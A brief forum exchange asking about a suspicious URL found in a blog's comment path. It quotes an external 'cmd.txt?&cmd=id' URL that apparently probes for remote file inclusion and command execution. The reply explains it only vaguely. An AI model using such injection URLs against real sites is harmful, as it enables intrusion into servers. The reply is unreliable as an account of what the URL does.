what does mean the below text :

The text show up, when yo go at the URL, http://www.psychic101.com/blog/comment. ... xt?&cmd=id

The url http://www.destroyerbus.hpg.ig.com.br/cmd.txt?&cmd=id look suspect .

That's because the link will only work if another blog is connecting to it and sending it the correct commands.

It will not work if you just open the link in a browser.
